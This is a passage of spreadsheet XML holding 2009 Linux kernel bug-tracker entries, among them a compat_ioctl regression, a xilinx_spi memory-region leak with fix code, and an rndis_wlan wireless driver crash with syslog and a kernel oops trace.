3450 iface MIXER name 'Capture Volume' index 1 value.0 0 value.1 0 } control.12 { comment.access 'read write' comment.type INTEGER comment.count 2 comment.range '0 - 31' comment.dbmin -1200 comment.dbmax 3450 iface MIXER name 'Capture Volume' index 2 value.0 0 value.1 0 } control.13 { comment.access 'read write' comment.type ENUMERATED comment.count 1 comment.item.0 Mic comment.item.1 'Front Mic' comment.item.2 Line comment.item.3 CD iface MIXER name 'Input Source' value 'Front Mic' } control.14 { comment.access 'read write' comment.type ENUMERATED comment.count 1 comment.item.0 Mic comment.item.1 'Front Mic' comment.item.2 Line comment.item.3 CD iface MIXER name 'Input Source' index 1 value 'Front Mic' } control.15 { comment.access 'read write' comment.type ENUMERATED comment.count 1 comment.item.0 Mic comment.item.1 'Front Mic' comment.item.2 Line comment.item.3 CD iface MIXER name 'Input Source' index 2 value 'Front Mic' } control.16 { comment.access 'read write user' comment.type INTEGER comment.count 2 comment.range '0 - 255' comment.tlv '0000000100000008ffffec1400000014' comment.dbmin -5100 comment.dbmax 0 iface MIXER name 'PCM Playback Volume' value.0 255 value.1 255 } control.17 { comment.access 'read write user' comment.type INTEGER comment.count 2 comment.range '0 - 120' comment.tlv '0000000100000008fffff44800000032' comment.dbmin -3000 comment.dbmax 3000 iface MIXER name 'Digital Capture Volume' value.0 60 value.1 60 } } --endcollapse-- !!All Loaded Modules !!------------------ Module binfmt_misc rfcomm l2cap kvm isofs zlib_inflate vfat fat fuse dm_crypt dm_mod vboxdrv loop snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss arc4 snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi_event snd_seq iwlagn iwlcore snd_timer snd_seq_device firewire_ohci mac80211 firewire_core snd joydev crc_itu_t soundcore cfg80211 hso sony_laptop snd_page_alloc rfkill video backlight tpm_infineon</t>
  </si>
  <si>
    <t>FREEZE/THAW compat_ioctl regression</t>
  </si>
  <si>
    <t>Commit 8e961870bb9804110d5c8211d5d9d500451c4518</t>
  </si>
  <si>
    <t>2009-02-25 14:36 UTC</t>
  </si>
  <si>
    <t>2009-03-01 00:47 UTC</t>
  </si>
  <si>
    <t>Subject : [PATCH] fix FREEZE/THAW compat_ioctl regression Submitter : Christoph Hellwig &lt;hch@lst.de&gt; Date : 2009-02-16 12:57 References : http://marc.info/?l=linux-kernel&amp;m=123478914319019&amp;w=2 Handled-By : Christoph Hellwig &lt;hch@lst.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123478914319019&amp;w=2 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>xilinx_spi does not releases mem-region at remove()</t>
  </si>
  <si>
    <t>2009-02-27 04:13 UTC</t>
  </si>
  <si>
    <t>Maxim Bourmistrov</t>
  </si>
  <si>
    <t>2012-05-30 14:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.28.2 Earliest failing kernel version: Distribution: Hardware Environment: x86 with Xilinx SPI on board Software Environment: Moblin2 with linux-2.6.28.2 Problem Description: xilinx_spi does not release mem-region upon remove() and upon error in probe(). Missing release_mem_region() and sanity check( check_mem_region() ). Steps to reproduce: insmod xilinx_spi rmmod xilinx_spi insmod xilinx_spi At this stage we are denied mem via request_mem_region() Fix (sorry no diff): lines to xilinx_spi_probe(): unmap_io: iounmap(xspi-&gt;regs); release_mem_region(r-&gt;start, resource_size(r)); affected xilinx_spi_remove: static int __devexit xilinx_spi_remove(struct platform_device *dev) { struct xilinx_spi *xspi; struct spi_master *master; struct resource *r; master = platform_get_drvdata(dev); xspi = spi_master_get_devdata(master); r = platform_get_resource(dev, IORESOURCE_MEM, 0); spi_bitbang_stop(&amp;xspi-&gt;bitbang); free_irq(xspi-&gt;irq, xspi); iounmap(xspi-&gt;regs); release_mem_region(r-&gt;start, resource_size(r)); platform_set_drvdata(dev, 0); spi_master_put(xspi-&gt;bitbang.master); return 0; }</t>
  </si>
  <si>
    <t>BCM4320a poor performance with rndis_wlan (was: rndis_wlan causes segmentation fault)</t>
  </si>
  <si>
    <t>2.6.32-rc5</t>
  </si>
  <si>
    <t>2009-03-01 05:25 UTC</t>
  </si>
  <si>
    <t>Pitxyoki</t>
  </si>
  <si>
    <t>2011-03-31 11:20 UTC</t>
  </si>
  <si>
    <t>Jussi Kivilinna</t>
  </si>
  <si>
    <t>Latest working kernel version: Don't Know Earliest failing kernel version: 2.6.29-rc6 Distribution: Debian Hardware Environment: $ lsusb Bus 005 Device 004: ID 13b1:000e Linksys This is an USB wireless adapter that is correctly identified by ndiswrapper as wlan0: ethernet device 00:12:17:a0:b9:7c using NDIS driver: wusb54gs, version: 0x33c0d03, NDIS version: 0x501, vendor: 'Linksys Wireless-G USB Network Adapter with SpeedBooster', 13B1:000E.F.conf Software Environment: Debian Lenny Problem Description: My wireless adapter works fine under kernel 2.6.26 with ndiswrapper and the Windows driver files loaded. If I remove ndiswrapper and modprobe rndis_wlan, the module gets loaded, but I get the following output when trying to get the device up: ############################# # modprobe -v rndis_wlan insmod /lib/modules/2.6.26-1-686/kernel/drivers/net/mii.ko insmod /lib/modules/2.6.26-1-686/kernel/drivers/net/usb/usbnet.ko insmod /lib/modules/2.6.26-1-686/kernel/drivers/net/usb/cdc_ether.ko insmod /lib/modules/2.6.26-1-686/kernel/drivers/net/usb/rndis_host.ko insmod /lib/modules/2.6.26-1-686/kernel/drivers/net/wireless/rndis_wlan.ko ####From /var/log/syslog:#### Mar 1 11:42:45 C-5 kernel: [ 149.780864] usbcore: registered new interface driver cdc_ether Mar 1 11:42:45 C-5 kernel: [ 149.836364] usbcore: registered new interface driver rndis_host Mar 1 11:42:46 C-5 kernel: [ 150.182544] rndis_wlan 5-4:1.0: rndis media disconnect Mar 1 11:42:46 C-5 kernel: [ 150.507274] wlan0: register 'rndis_wlan' at usb-0000:00:1d.7-4, Wireless RNDIS device, BCM4320a based, 01:0a:00:00:00:00 Mar 1 11:42:46 C-5 kernel: [ 150.507274] usbcore: registered new interface driver rndis_wlan Mar 1 11:42:46 C-5 kernel: [ 150.507274] udev: renamed network interface wlan0 to wlan1 ############################# # ifconfig -a eth1 Link encap:Ethernet HWaddr 00:11:2f:3b:9a:42 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:17 lo Link encap:Local Loopback LOOPBACK MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) wlan1 Link encap:Ethernet HWaddr 01:0a:00:00:00:00 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) [12:09:10] C-5:/etc/modprobe.d# iwconfig lo no wireless extensions. eth1 no wireless extensions. wlan1 IEEE802.11bg ESSID:off/any Mode:Managed Frequency:2.412 GHz Bit Rate:54 Mb/s Tx-Power=14 dBm RTS thr=2347 B Fragment thr=2346 B Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 [12:09:15] C-5:/etc/modprobe.d# ifup wlan1 Internet Systems Consortium DHCP Client V3.1.1 Copyright 2004-2008 Internet Systems Consortium. All rights reserved. For info, please visit http://www.isc.org/sw/dhcp/ SIOCSIFFLAGS: Cannot assign requested address SIOCSIFFLAGS: Cannot assign requested address Listening on LPF/wlan1/01:0a:00:00:00:00 Sending on LPF/wlan1/01:0a:00:00:00:00 Sending on Socket/fallback DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 6 send_packet: Network is down receive_packet failed on wlan1: Network is down DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 14 send_packet: Network is down DHCPDISCOVER on wlan1 to 255.255.255.255 port 67 interval 15 send_packet: Network is down ^C (...) ############################# I notice the hardware address seems strange (HWaddr 01:0a:00:00:00:00). Perhaps this has some relation to the issue. After compiling and booting to kernel 2.6.29-rc6 by following the instructions at [1], when I modprobe rndis_wlan I get a segmentation fault with some verbose output on the terminal: [11:36:47] C-5:/home/luis# modprobe -v rndis_wlan insmod /lib/modules/2.6.29-rc6/kernel/drivers/net/mii.ko insmod /lib/modules/2.6.29-rc6/kernel/drivers/net/usb/usbnet.ko insmod /lib/modules/2.6.29-rc6/kernel/drivers/net/usb/cdc_ether.ko insmod /lib/modules/2.6.29-rc6/kernel/drivers/net/usb/rndis_host.ko insmod /lib/modules/2.6.29-rc6/kernel/drivers/net/wireless/rndis_wlan.ko Segmentation fault [11:37:02] C-5:/home/luis# Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548593] last sysfs file: /sys/block/sda/sda1/stat Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548576] ------------[ cut here ]------------ Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548731] Process modprobe (pid: 2863, ti=f1b12000 task=f6bd7810 task.ti=f1b12000) Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548587] invalid opcode: 0000 [#1] SMP Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548735] Stack: Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548762] 0001010e f1fec480 f19d0878 f19d0800 00000401 f1b13e5c f19d0800 f1fec480 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548774] Call Trace: Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548777] [&lt;f8c53329&gt;] rndis_command+0x1b8/0x247 [rndis_host] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548788] [&lt;f8c602e2&gt;] rndis_set_oid+0xc9/0x123 [rndis_wlan] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548798] [&lt;f8c61fbb&gt;] rndis_wext_bind+0xa3/0x296 [rndis_wlan] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548807] [&lt;c0197a3b&gt;] find_inode+0x1b/0x56 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548813] [&lt;c0286ca1&gt;] alloc_netdev_mq+0xfa/0x105 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548822] [&lt;c02911ed&gt;] ether_setup+0x0/0x74 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548834] [&lt;f8c0c57b&gt;] usbnet_probe+0x221/0x4fc [usbnet] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548851] [&lt;f88805e3&gt;] usb_match_one_id+0x19/0x6e [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548885] [&lt;f8880b92&gt;] usb_autopm_do_device+0xb4/0xbb [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548750] 0000000c 00000000 f19d09f8 f1b13e60 f19d0a18 00000020 f8c602e2 f1b13e5c Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548921] [&lt;f888134c&gt;] usb_probe_interface+0xe2/0x12b [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548965] [&lt;c0262d51&gt;] __driver_attach+0x49/0x67 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548975] [&lt;c0262708&gt;] bus_for_each_dev+0x35/0x5b Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548956] [&lt;c0262c79&gt;] driver_probe_device+0x99/0x128 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548986] [&lt;c0262b30&gt;] driver_attach+0x11/0x13 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548992] [&lt;c0262d08&gt;] __driver_attach+0x0/0x67 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548999] [&lt;c026218e&gt;] bus_add_driver+0x91/0x1a7 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549014] [&lt;c0262ed5&gt;] driver_register+0x7d/0xd6 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549032] [&lt;f888115b&gt;] usb_register_driver+0x5d/0xb4 [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549065] [&lt;f8c2f000&gt;] rndis_wlan_init+0x0/0x14 [rndis_wlan] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549075] [&lt;c010112c&gt;] _stext+0x44/0x119 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549081] [&lt;c0160299&gt;] tracepoint_module_notify+0x21/0x24 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549089] [&lt;c013acae&gt;] notifier_call_chain+0x2a/0x47 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549100] [&lt;c013af03&gt;] __blocking_notifier_call_chain+0x3f/0x49 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549111] [&lt;c0147c27&gt;] sys_init_module+0x87/0x182 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549118] [&lt;c01033db&gt;] sysenter_do_call+0x12/0x2f Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549125] Code: 06 8b 0d bc 34 3d c0 8b 00 f7 d0 8b 04 88 eb 80 56 53 89 c3 89 d6 f0 0f ba 29 00 19 c0 31 d2 85 c0 75 2a 8d 41 04 39 41 04 74 04 &lt;0f&gt; 0b eb fe 83 7e 10 00 0f 45 1d bc 34 3d c0 8b 06 f7 d0 8b 04 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549190] EIP: [&lt;c0135197&gt;] queue_work_on+0x1b/0x42 SS:ESP 0068:f1b13dc4 [11:37:02] C-5:/home/luis# ##########################/var/log/syslog:###################################### Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548576] ------------[ cut here ]------------ Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548593] last sysfs file: /sys/block/sda/sda1/stat Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548587] invalid opcode: 0000 [#1] SMP Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548731] Process modprobe (pid: 2863, ti=f1b12000 task=f6bd7810 task.ti=f1b12000) Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548735] Stack: Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548762] 0001010e f1fec480 f19d0878 f19d0800 00000401 f1b13e5c f19d0800 f1fec480 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548774] Call Trace: Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548777] [&lt;f8c53329&gt;] rndis_command+0x1b8/0x247 [rndis_host] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548788] [&lt;f8c602e2&gt;] rndis_set_oid+0xc9/0x123 [rndis_wlan] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548798] [&lt;f8c61fbb&gt;] rndis_wext_bind+0xa3/0x296 [rndis_wlan] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548807] [&lt;c0197a3b&gt;] find_inode+0x1b/0x56 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548813] [&lt;c0286ca1&gt;] alloc_netdev_mq+0xfa/0x105 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548822] [&lt;c02911ed&gt;] ether_setup+0x0/0x74 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548834] [&lt;f8c0c57b&gt;] usbnet_probe+0x221/0x4fc [usbnet] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548851] [&lt;f88805e3&gt;] usb_match_one_id+0x19/0x6e [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548750] 0000000c 00000000 f19d09f8 f1b13e60 f19d0a18 00000020 f8c602e2 f1b13e5c Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548885] [&lt;f8880b92&gt;] usb_autopm_do_device+0xb4/0xbb [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548921] [&lt;f888134c&gt;] usb_probe_interface+0xe2/0x12b [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548965] [&lt;c0262d51&gt;] __driver_attach+0x49/0x67 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548956] [&lt;c0262c79&gt;] driver_probe_device+0x99/0x128 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548975] [&lt;c0262708&gt;] bus_for_each_dev+0x35/0x5b Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548986] [&lt;c0262b30&gt;] driver_attach+0x11/0x13 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548992] [&lt;c0262d08&gt;] __driver_attach+0x0/0x67 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.548999] [&lt;c026218e&gt;] bus_add_driver+0x91/0x1a7 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549014] [&lt;c0262ed5&gt;] driver_register+0x7d/0xd6 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549032] [&lt;f888115b&gt;] usb_register_driver+0x5d/0xb4 [usbcore] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549065] [&lt;f8c2f000&gt;] rndis_wlan_init+0x0/0x14 [rndis_wlan] Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549075] [&lt;c010112c&gt;] _stext+0x44/0x119 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549081] [&lt;c0160299&gt;] tracepoint_module_notify+0x21/0x24 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549089] [&lt;c013acae&gt;] notifier_call_chain+0x2a/0x47 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549100] [&lt;c013af03&gt;] __blocking_notifier_call_chain+0x3f/0x49 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549111] [&lt;c0147c27&gt;] sys_init_module+0x87/0x182 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549118] [&lt;c01033db&gt;] sysenter_do_call+0x12/0x2f Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549125] Code: 06 8b 0d bc 34 3d c0 8b 00 f7 d0 8b 04 88 eb 80 56 53 89 c3 89 d6 f0 0f ba 29 00 19 c0 31 d2 85 c0 75 2a 8d 41 04 39 41 04 74 04 &lt;0f&gt; 0b eb fe 83 7e 10 00 0f 45 1d bc 34 3d c0 8b 06 f7 d0 8b 04 Message from syslogd@C-5 at Sun Mar 1 11:37:02 2009 ... C-5 kernel: [ 91.549190] EIP: [&lt;c0135197&gt;] queue_work_on+0x1b/0x42 SS:ESP 0068:f1b13dc4 Mar 1 11:37:02 C-5 kernel: [ 91.211925] usbcore: registered new interface driver cdc_ether Mar 1 11:37:02 C-5 kernel: [ 91.256692] usbcore: registered new interface driver rndis_host Mar 1 11:37:02 C-5 kernel: [ 91.548549] rndis_wlan 5-4:1.0: rndis media disconnect Mar 1 11:37:02 C-5 kernel: [ 91.548576] ------------[ cut here ]------------ Mar 1 11:37:02 C-5 kernel: [ 91.548582] kernel BUG at kernel/workqueue.c:189! Mar 1 11:37:02 C-5 kernel: [ 91.548587] invalid opcode: 0000 [#1] SMP Mar 1 11:37:02 C-5 kernel: [ 91.548593] last sysfs file: /sys/block/sda/sda1/stat Mar 1 11:37:02 C-5 kernel: [ 91.548596] Modules linked in: rndis_wlan(+) rndis_host cdc_ether usbnet mii snd_seq_dummy i915 drm ppdev lp i2c_algo_bit ipv6 ntfs nls_utf8 nls_cp437 vfat fat nls_base w83627ehf hwmon_vid sbp2 loop snd_hda_codec_cmedia snd_hda_intel serio_raw psmouse i2c_i801 snd_hda_codec pcspkr rng_core i2c_core iTCO_wdt snd_pcm snd_seq snd_timer snd_seq_device parport_pc parport snd button soundcore snd_page_alloc intel_agp agpgart evdev ext3 jbd mbcache sg sr_mod cdrom sd_mod ide_pci_generic piix ata_generic ide_gd_mod ahci ata_piix libata it821x floppy scsi_mod ohci1394 ide_core ehci_hcd ieee1394 uhci_hcd usbcore sky2 thermal processor fan thermal_sys Mar 1 11:37:02 C-5 kernel: [ 91.548692] Mar 1 11:37:02 C-5 kernel: [ 91.548697] Pid: 2863, comm: modprobe Not tainted (2.6.29-rc6 #1) To Be Filled By O.E.M. Mar 1 11:37:02 C-5 kernel: [ 91.548703] EIP: 0060:[&lt;c0135197&gt;] EFLAGS: 00210213 CPU: 0 Mar 1 11:37:02 C-5 kernel: [ 91.548712] EIP is at queue_work_on+0x1b/0x42 Mar 1 11:37:02 C-5 kernel: [ 91.548717] EAX: f19d086c EBX: 00000000 ECX: f19d0868 EDX: 00000000 Mar 1 11:37:02 C-5 kernel: [ 91.548721] ESI: 00000000 EDI: f8c539a8 EBP: f1fec480 ESP: f1b13dc4 Mar 1 11:37:02 C-5 kernel: [ 91.548726] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 Mar 1 11:37:02 C-5 kernel: [ 91.548731] Process modprobe (pid: 2863, ti=f1b12000 task=f6bd7810 task.ti=f1b12000) Mar 1 11:37:02 C-5 kernel: [ 91.548735] Stack: Mar 1 11:37:02 C-5 kernel: [ 91.548738] f68ea688 f19d09f8 f8c53329 00000401 f1fec550 00000000 00000000 80000005 Mar 1 11:37:02 C-5 kernel: [ 91.548750] 0000000c 00000000 f19d09f8 f1b13e60 f19d0a18 00000020 f8c602e2 f1b13e5c Mar 1 11:37:02 C-5 kernel: [ 91.548762] 0001010e f1fec480 f19d0878 f19d0800 00000401 f1b13e5c f19d0800 f1fec480 Mar 1 11:37:02 C-5 kernel: [ 91.548774] Call Trace: Mar 1 11:37:02 C-5 kernel: [ 91.548777] [&lt;f8c53329&gt;] rndis_command+0x1b8/0x247 [rndis_host] Mar 1 11:37:02 C-5 kernel: [ 91.548788] [&lt;f8c602e2&gt;] rndis_set_oid+0xc9/0x123 [rndis_wlan] Mar 1 11:37:02 C-5 kernel: [ 91.548798] [&lt;f8c61fbb&gt;] rndis_wext_bind+0xa3/0x296 [rndis_wlan] Mar 1 11:37:02 C-5 kernel: [ 91.548807] [&lt;c0197a3b&gt;] find_inode+0x1b/0x56 Mar 1 11:37:02 C-5 kernel: [ 91.548813] [&lt;c0286ca1&gt;] alloc_netdev_mq+0xfa/0x105 Mar 1 11:37:02 C-5 kernel: [ 91.548822] [&lt;c02911ed&gt;] ether_setup+0x0/0x74 Mar 1 11:37:02 C-5 kernel: [ 91.548834] [&lt;f8c0c57b&gt;] usbnet_probe+0x221/0x4fc [usbnet] Mar 1 11:37:02 C-5 kernel: [ 91.548851] [&lt;f88805e3&gt;] usb_match_one_id+0x19/0x6e [usbcore] Mar 1 11:37:02 C-5 kernel: [ 91.548885] [&lt;f8880b92&gt;] usb_autopm_do_device+0xb4/0xbb [usbcore] Mar 1 11:37:02 C-5 kernel: [ 91.548921] [&lt;f888134c&gt;] usb_probe_interface+0xe2/0x12b [usbcore] Mar 1 11:37:02 C-5 kernel: [ 91.548956] [&lt;c0262c79&gt;] driver_probe_device+0x99/0x128 Mar 1 11:37:02 C-5 kernel: [ 91.548965] [&lt;c0262d51&gt;] __driver_attach+0x49/0x67 Mar 1 11:37:02 C-5 kernel: [ 91.548975] [&lt;c0262708&gt;] bus_for_each_dev+0x35/0x5b Mar 1 11:37:02 C-5 kernel: [ 91.548986] [&lt;c0262b30&gt;] driver_attach+0x11/0x13 Mar 1 11:37:02 C-5 kernel: [ 91.548992] [&lt;c0262d08&gt;] __driver_attach+0x0/0x67 Mar 1 11:37:02 C-5 kernel: [ 91.548999] [&lt;c026218e&gt;] bus_add_driver+0x91/0x1a7 Mar 1 11:37:02 C-5 kernel: [ 91.549014] [&lt;c0262ed5&gt;] driver_register+0x7d/0xd6 Mar 1 11:37:02 C-5 kernel: [ 91.549032] [&lt;f888115b&gt;] usb_register_driver+0x5d/0xb4 [usbcore] Mar 1 11:37:02 C-5 kernel: [ 91.549065] [&lt;f8c2f000&gt;] rndis_wlan_init+0x0/0x14 [rndis_wlan] Mar 1 11:37:02 C-5 kernel: [ 91.549075] [&lt;c010112c&gt;] _stext+0x44/0x119 Mar 1 11:37:02 C-5 kernel: [ 91.549081] [&lt;c0160299&gt;] tracepoint_module_notify+0x21/0x24 Mar 1 11:37:02 C-5 kernel: [ 91.549089] [&lt;c013acae&gt;] notifier_call_chain+0x2a/0x47 Mar 1 11:37:02 C-5 kernel: [ 91.549100] [&lt;c013af03&gt;] __blocking_notifier_call_chain+0x3f/0x49 Mar 1 11:37:02 C-5 kernel: [ 91.549111] [&lt;c0147c27&gt;] sys_init_module+0x87/0x182 Mar 1 11:37:02 C-5 kernel: [ 91.549118] [&lt;c01033db&gt;] sysenter_do_call+0x12/0x2f Mar 1 11:37:02 C-5 kernel: [ 91.549125] Code: 06 8b 0d bc 34 3d c0 8b 00 f7 d0 8b 04 88 eb 80 56 53 89 c3 89 d6 f0 0f ba 29 00 19 c0 31 d2 85 c0 75 2a 8d 41 04 39 41 04 74 04 &lt;0f&gt; 0b eb fe 83 7e 10 00 0f 45 1d bc 34 3d c0 8b 06 f7 d0 8b 04 Mar 1 11:37:02 C-5 kernel: [ 91.549190] EIP: [&lt;c0135197&gt;] queue_work_on+0x1b/0x42 SS:ESP 0068:f1b13dc4 Mar 1 11:37:02 C-5 kernel: [ 91.549201] ---[ end trace 6c88d7dc3a1cb034 ]--- ############################# After this segfault, the network interface doesn't even show up on ifconfig or iwconfig: [12:36:18] C-5:/etc/modprobe.d# ifconfig -a eth1 Link encap:Ethernet HWaddr 00:11:2f:3b:9a:42 BROADCAST MULTICAST MTU:1500 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) Interrupt:17 lo Link encap:Local Loopback LOOPBACK MTU:16436 Metric:1 RX packets:0 errors:0 dropped:0 overruns:0 frame:0 TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) [12:36:23] C-5:/etc/modprobe.d# iwconfig lo no wireless extensions. eth1 no wireless extensions. [12:36:26] C-5:/etc/modprobe.d# lsmod | grep ndis rndis_wlan 18628 1 rndis_host 6316 1 rndis_wlan cdc_ether 4380 1 rndis_host usbnet 13768 3 rndis_wlan,rndis_host,cdc_ether usbcore 124440 7 rndis_wlan,rndis_host,cdc_ether,usbnet,ehci_hcd,uhci_hcd Regards, Luís Picciochi [1] - http://kernel-handbook.alioth.debian.org/lenny/ch-common-tasks.html</t>
  </si>
  <si>
    <t>x86 PAT invalid vm_insert_pfn assumptions</t>
  </si>
  <si>
    <t>2.6.29 rc series</t>
  </si>
  <si>
    <t>2009-03-02 01:40 UTC</t>
  </si>
  <si>
    <t>Thomas Hellstrom</t>
  </si>
  <si>
    <t>2010-01-19 21:35 UTC</t>
  </si>
  <si>
